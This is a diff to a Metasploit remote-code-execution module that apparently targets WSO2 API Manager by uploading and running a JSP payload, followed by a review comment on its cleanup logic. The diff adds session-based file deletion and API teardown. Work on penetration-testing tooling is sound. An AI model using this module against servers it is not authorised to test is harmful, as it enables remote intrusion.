@@ -7,7 +7,6 @@ class MetasploitModule < Msf::Exploit::Remote
77 Rank = ExcellentRanking
88
99 include Msf ::Exploit ::Remote ::HttpClient
10- include Msf ::Exploit ::FileDropper
1110 prepend Msf ::Exploit ::Remote ::AutoCheck
1211
1312 attr_accessor :bearer
@@ -275,7 +274,7 @@ def create_api
275274 end
276275
277276 def create_product_api
278- api_id = create_api [ 'id' ]
277+ @ api_id = create_api [ 'id' ]
279278
280279 product_api_data = {
281280 'name' => Faker ::App . name ,
@@ -284,7 +283,7 @@ def create_product_api
284283 'apis' => [
285284 {
286285 'name' => '' ,
287- 'apiId' => api_id ,
286+ 'apiId' => @ api_id,
288287 'operations' => [ ] ,
289288 'version' => '1.0.0'
290289 }
@@ -304,6 +303,8 @@ def create_product_api
304303
305304 fail_with ( Failure ::UnexpectedReply , 'Failed to create API Product' ) unless res &.code == 201
306305
306+ @api_created = true
307+
307308 print_good ( 'API Product created successfully' )
308309
309310 return res . get_json_document
@@ -357,7 +358,7 @@ def upload_payload(api_id, doc_id)
357358 fail_with ( Failure ::UnexpectedReply , 'Payload upload attempt failed' ) unless res &.code == 201
358359
359360 print_good ( 'Payload uploaded successfully' )
360- register_file_for_cleanup ( jsp_filename )
361+
361362 return res
362363 end
363364
@@ -380,19 +381,72 @@ def exploit
380381 authenticate unless bearer
381382 api_avaliable = list_product_api
382383 api_avaliable . each do |product_api |
383- doc_id = create_document ( product_api [ 'id' ] )
384- next unless doc_id
384+ @product_api_id = product_api [ 'id' ]
385+ @doc_id = create_document ( @product_api_id )
386+ next unless @doc_id
385387
386- res = upload_payload ( product_api [ 'id' ] , doc_id )
388+ res = upload_payload ( @product_api_id , @ doc_id)
387389 if res &.code == 201
388390 execute_payload
389391 break
390392 end
391393 end
392394 end
393395
396+ def on_new_session ( session )
397+ super
398+ # Registering for cleanup doesn't work as the file is not placed in the CWD, and the WSO2_SERVER_HOME might vary
399+ session . shell_command_token ( "rm -rf $WSO2_SERVER_HOME/repository/deployment/server/webapps/authenticationendpoint/#{ jsp_filename } " )
400+ end
401+
402+ def cleanup
403+ return unless session_created?
404+
405+ super
406+
407+ # If we have created the API, we need to delete it; thus the documentation
408+ return delele_product_api && delele_api if @api_created
409+
410+ # If the API was already there, we deleted only the documentation.
411+ delete_document
412+ end
413+
394414 def jsp_filename
395415 @jsp_filename ||= "#{ rand_text_alphanumeric ( 8 ..16 ) } .jsp"
396416 end
397417
418+ def delete_document
419+ res = send_request_cgi (
420+ 'uri' => normalize_uri ( target_uri . path , '/api/am/publisher/' , target . opts [ 'api_version' ] , '/api-products/' , @api_id , '/documents/' , @doc_id ) ,
421+ 'method' => 'DELETE' ,
422+ 'headers' => {
423+ 'Authorization' => "Bearer #{ bearer } "
424+ }
425+ )
426+
427+ return res &.code == 200
428+ end
429+
430+ def delele_api
431+ res = send_request_cgi (
432+ 'uri' => normalize_uri ( target_uri . path , '/api/am/publisher/' , target . opts [ 'api_version' ] , '/apis/' , @api_id ) ,
433+ 'method' => 'DELETE' ,
434+ 'headers' => {
435+ 'Authorization' => "Bearer #{ bearer } "
436+ }
437+ )
438+ return res &.code == 200
439+ end
440+
441+ def delele_product_api
442+ res = send_request_cgi (
443+ 'uri' => normalize_uri ( target_uri . path , '/api/am/publisher/' , target . opts [ 'api_version' ] , '/api-products/' , @product_api_id ) ,
444+ 'method' => 'DELETE' ,
445+ 'headers' => {
446+ 'Authorization' => "Bearer #{ bearer } "
447+ }
448+ )
449+ return res &.code == 200
450+ end
451+
398452end
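Review bot: `delete_document` builds its URL from `@api_id`, but `exploit` creates the document with `create_document(@product_api_id)`, and in the visible hunks `@api_id` is only assigned inside `create_product_api`. On the pre-existing-API path that the `cleanup` comment describes, `@api_id` is therefore presumably nil and the DELETE cannot address the uploaded document; use the same id on both sides: `'/api-products/', @product_api_id, '/documents/', @doc_id`. In `cleanup`, `return unless session_created?` runs before `super`, so when the upload succeeded but no session arrived the parent cleanup is skipped and the created API, product and document stay on the assessed server. Calling `super` first and keying the deletions on `@api_created` / `@doc_id` instead of on the session would avoid that. The boolean results of the `delele_*` helpers (likely a typo for `delete_*`) are never reported, so a `print_warning` naming the leftover artifact would tell the operator what to remove by hand.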